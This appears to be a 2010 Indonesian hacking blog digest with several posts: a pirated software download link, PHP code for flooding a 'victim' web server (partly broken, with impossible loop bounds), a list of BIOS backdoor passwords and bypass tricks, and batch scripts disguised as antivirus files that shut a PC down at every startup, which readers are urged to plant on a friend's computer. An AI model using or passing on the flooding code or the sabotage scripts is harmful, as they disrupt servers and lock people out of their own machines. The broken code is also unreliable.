25 Maret 2010

Ora Gene-Gene | White Hack System Only

Ora Gene-Gene | White Hack System Only



Download Alkohol 120% Free Full Version

Posted: 23 Mar 2010 10:39 PM PDT

Gag perlu lama-lama,,, Downloadnya

disana

Hati-hati, mabok loh,,,, hehe

Flooding Host

Posted: 23 Mar 2010 10:36 PM PDT

PoC] Flooding
Flooding adalah membanjiri suatu host dengan paket2 data dalam jumlah banyak berukuran besar. Flood dilakukan dari banyak host. jika dari sebuah host, tidak menjadi flood. hanya jadi gerimis aja.

Bagaimana Flood bisa terjadi?

first, koneksi. kita harus melakukan koneksi dulu ke host yang akan di flood. koneksi ini, tergantung service apa yang akan kita flood, atau jalur apa yang akan kita banjiri. Misal kita akan membanjiri jalur HTTP pada host korban.com.

Sebagaimana kita ketahui, bahwa http berjalan pada tcp port 80. Maka kita lakukan koneksi ke port 80 pada jalur tcp ke host korban.com

Code:
$connect = fsockopen("tcp://korban.com",80);

setelah kita mendapatkan koneksi, secara default server akan menunggu paket yang akan kita kirim.

masa menunggu ini, server akan mengalokasikan memorinya, dan menambah konected host. secara default, server punya batas waktu max host konek. misal 60 detik. juga max konected host, misal 30 host pada saat yang sama.

jika kita konek, maka kita konekted host berkurang 1. jadi 29. dst. jika sudah mencapai 30, maka host lain tidak bisa konek. sehingga server seolah2 mati, padahal tidak.

di sini, kita bisa saja melakukan flood konection. kita koneksikan 30 host pada saat yang sama, dan tanpa menutup koneksi aktif. sehingga, server akan menolak host lain yang konek.

untuk mempertahankan penolakan terhadap host lain, maka kita harus mempertahankan koneksi kita. salah satu caranya adalah, melakukan koneksi terus menerus tanpa menutupnya. hal ini di lakukan karena ini merupakan sebuah kompetisi untuk mendapatkan koneksi.

Code:
while(1){
$connect = fsockopen("tcp://korban.com",80);
}

cara lain adalah, dengan mengirimkan paket dalam delay tertentu. sehingga server akan mengira kita bener2 request ke sana. delay ini sesuai dengan max konection time server. misal 30 detik.

Code:
$connect = fsockopen("tcp://korban.com",80);
$maxtime = 30;
while(1){
if(!$maxtime) $maxtime=30;
if($maxtime==30) fwrite($connect,"A");
$maxtime--;
}

Kebanyakan server sudah mengkonfigurasi untuk menutup paket yg limit time seperti ini.

next!!

Flood lain dan yang lebih konvensional, adalah membanjiri server dengan paket data.

kita sudah tau bagaimana mendapatkan koneksi ke server. berikutnya, kita akan mengirimkan paket data dalam jumlah raksasa ke server. dalam membanjiri data seperti ini, kita tidak boleh membiarkan koneksi terbuka. hal ini akan memberati flooder host, dan koneksi akan di tolak. maka, kita buka dan tutup koneksi setelah mengirim paket data. kemudian melakukan hal yang sama ribuan kali.

Code:
for($i=0;$i<999999999999;$i++){
$paket .= "A";
}
while($time<999){
$konek = fsockopen("tcp://korban.com",80,30);
fwrite($konek,$paket);
fclose($konek);
}

dalam praktek flooding, kita tidak akan bisa ngeflood dari 1 host saja. kita butuh banyak host yang melakukan flood pada saat yang sama (DDoS).


^^

Tools Mengembalikan Files di Hardisk yang Terhapus

Posted: 23 Mar 2010 09:43 PM PDT

Saya baru nemu nih.. dari webnya RECUVA mengembalikan file yang terhapus (kata website nya)

Accidentally deleted an important file? Lost something important when your computer crashed? No problem! Recuva recovers files deleted from your Windows computer, Recycle Bin, digital camera card, or MP3 player. And it's free!

fiturnya lumayan lengkap:

Recuva - Features
File Recovery

Recuva
Undelete files on your computer
Deleted a file by mistake? Recuva brings lost files on your computer,
USB drive, camera or iPod.
Recovery from damaged or formatted disks
Even if you've formatted a drive so that it looks blank, Recuva can still find your files on it.

Recover deleted emails
Emptied your email trash and need it back? Recuva's got you covered with full support for Microsoft Outlook Express, Mozilla Thunderbird, or Windows Live Mail.

Recover deleted iPod music
Deleted music from your iPod or MP3 player? No problem, Recuva will get this back for you along with any additional track data.

Restore unsaved Word documents
Did Microsoft Word crash or did you forget to save that important Word document. No problem with Recuva! As it can intelligently rebuild Word documents from their temporary files.

Quick-Start Wizard
If you need your files back right away without fiddling with options, Recuva's Quick-Start Wizard is the answer.

Deep Scan
Recuva can find most files within a minute. Or, set the Deep Scan to look for more deeply-buried results.
Securely delete files you want to erase forever
Want to protect your deleted files? Recuva also allows you to permanently erase any traces of deleted files.

Portable version
Take Recuva with you wherever you go with the portable version.
Full Windows OS support and many languages
Recuva has support for every modern version of Windows and 37+ languages.

softwarenya bisa download gratis

di sini

enaknya pake yg portable version nya (katanya)

Cara Bypass Password BIOS

Posted: 23 Mar 2010 09:28 PM PDT

Password BIOS bisa memberikan proteksi lebih kepada PC atau leptop. Password BIOS digunakan untuk mencegah user yang ingin usil mengubah setting BIOS atau mencegah booting tanpa password. Untungnya password BIOS menyediakan default password BIOS untuk membantu user ketika user lupa passwordnya. Mengembalikan PC atau leptop ke perusahaanya untuk mereset BIOS akan membutuhkan biaya yang cukup mahal dan biasanya tidak masuk ke dalam garansi. Tetapi jangan takut, ada banyak backdoor atau trik yang bisa digunakan untuk bypass atau reset BIOS.

WARNING:
Artikel ini ditujukan untuk para profesional IT dan sistem administrator dengan pengalaman pelayanan hardware komputer. Hal ini tidak dimaksudkan untuk pengguna rumahan, hacker, atau usaha penyusupan / pencurian komputer untuk meng-crack pada PC curian. Tolong jangan mencoba salah satu prosedur ini jika Anda belum terbiasa dengan hardware komputer, dan mohon gunakan informasi ini secara bertanggung jawab. Ane tidak bertanggung jawab atas penggunaan atau penyalahgunaan bahan ini, termasuk kehilangan data, kerusakan hardware, atau cedera pribadi.

Sebelum kita mulai bypass password BIOS, ada baiknya anda menghubungi perusahaan hardware yang anda pakai dan menanyakan saran mereka untuk melakukan bypass kepada BIOS security. Tetapi, jika perusahaan tidak bisa (atau tidak mau) membantu anda untuk melakukan bypass pada BIOS, ada beberapa cara yang bisa anda digunakan untuk melakukan bypass atau mereset password BIOS. Beberapa caranya adalah:

1. Menggunakan backdoor yang telah disediakan oleh perusahaan
2. Menggunakan software cracking.
3. Mereset CMOS menggunakan jumper atau solder beads.
4. Mengeluarkan baterainya CMOS kurang lebih 10 menit.
5. Menggunakan overloading keyboard buffer.
6. Menggunakan profesional service

Untuk diingat, bahwa sebagian besar password BIOS tidak melindungi Harddisk, jadi jika anda ingin merecovery data anda, keluarkan harddisk anda dan instal pada system yang sama. oh ya, cara tersebut digunakan untuk PC, leptop tidak bisa, khususnya IBM thinkspads yang akan mengunci harddisk jika supervisor passwordnya diaktifkan. Jika supervisor passwordnya direset tanpa mereset Harddisk juga, anda tidak akan bisa mengakses data yang ada di dalam harddisk.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Password Backdoor

Banyak perusahaan BIOS yang menyediakan backdoor password yang bisa digunakan untuk mengakses BIOS setup ketika anda lupa dengan password BIOS anda. Password-password tersebut case sensitive (gak boleh salah satu huruf pun), Jadi anda harus mencoba dari beberapa variasi dari kombinasi-kombinasi yang ada. Leptop biasanya memiliki BIOS password yang lebih baik daripada BIOS password pada PC.

Warning: Beberapa settingan pada BIOS password akan mengunci sistem anda jika anda salah memasukkan lebih dari 3 kali. Baca dokumen dari perusahaan tempat anda membeli PC/leptop tentang setting BIOS sebelum anda mulai mengetikkan password.

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

Beberapa Password BIOS yang umum:

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

Password BIOS bawaan dari beberapa perusahaan:

perusahaan Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS :

Kebanyakan PC/leptop Toshiba akan melakukan bypass BIOS password ketika anda menekan dan menahan tombol shift yang kiri ketika booting.

IBM APTIVA BIOS :

Klik kedua tombol pada mouse beberapa kali ketika booting

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Software Cracking Password

Beberapa software dibawah ini biasanya digunakan untuk mengcrack atau mereset BIOS pada beberapa chipset. Jika PC anda terkunci dengan Administrator BIOS password dan tidak memperbolehkan akses kepada USB, software tersebut mungkin tidak berfungsi. Software-software ini bukan berasal dari perusahaan-perusahaan penyedia BIOS, jadi gunakan software ini dengan hati-hati dan tanggung sendiri resikonya (Jangan salahkan saya kalo ada apa-apa sama PC/leptop anda. ^_^).

CMOS password recovery tools 3.1
RemPass
KILLCMOS

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Menggunakan Motherboard "Clear CMOS" Jumper atau Dipswitch setting

Beberapa motherboard menyediakan fasilitas jumper atau dipswitches yang bisa menghapus CMOS dan menghapus semua custom setting, termasuk BIOS password. Lokasi dari jumpers / dipswitch tergantung dari perusahaan penyedia motherboard yang biasanya terdapat dalam buku panduan. Jika didalam buku panduan tidak ada, jumper / dipswitch biasanya terletak di sekitar ujung dari motherboard, dekat dengan CMOS baterai, atau dekat dengan prosesor. Beberapa perusahaan akan memberikan label pada jumper / dipswitch, yang biasanya diberi label CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. kalau pada leptop, dipswitch biasanya terletak di bawah keyboard atau dibawah compartment leptop.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Melepaskan Baterai CMOS

Pengaturan CMOS pada kebanyakan sistem buffer oleh baterai kecil yang ditancapkan pada motherboard. (Ini terlihat seperti baterai jam tangan yang kecil). Jika Anda telah mematikan PC dan keluarkan baterai selama 10-15 menit, CMOS akan me-reset dirinya sendiri dan password akan kosong. (Bersama dengan mesin lain pengaturan tertentu, jadi pastikan Anda sudah familiar dengan konfigurasi ulang secara manual dalam pengaturan BIOS sebelum Anda melakukannya.) Beberapa pabrik cadangan kekuatan untuk chipset CMOS dengan menggunakan sebuah kapasitor, jadi jika usaha pertama Anda gagal, biarkan baterai keluar (dengan sistem unplugged) selama 24 jam. Beberapa baterai disolder sebenarnya ke mobo Anda sehingga membuat tugas ini semakin sulit. Membuka solder baterai secara tidak tepat dapat merusak motherboard dan komponen lainnya, jadi tolong jangan mencoba ini jika Anda tidak berpengalaman. Pilihan lain mungkin untuk mencabut sementara chip CMOS dari mobo dalam jangka waktu tertentu.
Catatan: Pencabutan baterai untuk me-reset CMOS tidak akan bekerja untuk semua PC, dan hampir semua laptop yang lebih baru menyimpan password BIOS dalam cara yang tidak membutuhkan power secara berkelanjutan, jadi pencabutan baterai CMOS mungkin tidak bekerja sama sekali. Laptop IBM Thinkpad mengunci hard drive sebagaimana BIOS ketika password Supervisor diisi. Jika Anda mereset password BIOS, namun tidak dapat me-reset password hard drive, Anda mungkin tidak dapat mengakses drive dan akan tetap terkunci, bahkan jika Anda memajangnya di laptop baru. IBM Thinkpads mempunyai jumper switch khusus pada motherboard, dan ini harus digunakan untuk me-reset sistem.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Overloading Keyboard Buffer

Pada beberapa sistem komputer yang lama, anda bisa memaksa CMOS untuk masuk layar setup pada booting dengan melakukan overloading keyboard buffer. Cara ini bisa berhasil dengan cara keyboard atau mouse tidak di tancepin ke PC atau dengan cara menekan tombol ESC lebih dari 100 kali.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Jumping pada Solder Beads di CMOS

Cara ini memungkinkan untuk mereset CMOS dengan menghubungkan atau jumping spesifik solder beads pada chipset. Sangat banyak chipset yang digunakan untuk melakukan breakdown pada beberapa point untuk melakukan jumping pada individual chipset, dan lokasi dari solder beads sendiri tergantung dari perusahaan penyedia motherboard. Cara ini tidak disarankan bagi mereka yang belum berpengalaman mengenai BIOS.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Menggunakan Profesional Service

Jika perusahaan dari PC/Laptop tidak bisa atau tidak mau mereset BIOS password anda, anda bisa menggunakan profesional service untuk mereset BIOS password anda. Password Cracker Inc. Menawarkan banyak pilihan service untuk PC/laptop anda yang harga servicenya berkisar antara $100 sampai $400. Untuk kebanyakan service, anda memerlukan semacam bukti kepemilikan dari PC/laptop anda. Syarat ini agak sulit jika anda membeli PC/laptop anda secara second atau dari lelang Online.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Source : underground site

Shut Down Komputer untuk Selamanya

Posted: 23 Mar 2010 09:16 PM PDT

Virus yang beretika:

Ketik di notepad
start shutdown.exe -f -t 0 -s atau start logoff.exe
save jd symantec.bat atau norton.cmd
Jd in startup degh, rebes khan ...

Cara lain :
jgn di kompie sendiri ya, coz saya enggak tanggung


[color=#FF0000]:start
@echo off
explorer.exe
goto start[/color]


kemudian save As dengan extension BAT,,,
Inget jangan di kompi sendir, cari kompi temen,,, Atu low mw pake di kompie sendiri min ada deepfreezex,,,,

Eh, ada lagi :

@ echo off
shutdown.exe -s -t 3 -c "bye bye"


di save kasih nama terserah tapi ekstensi .bat terus ditaruh di startup , jadi tiap nyala langsung mati,
jadi ga punya kesempatan buat ngetik shutdown.exe

Met berjuang,,,

Tidak ada komentar:

Posting Komentar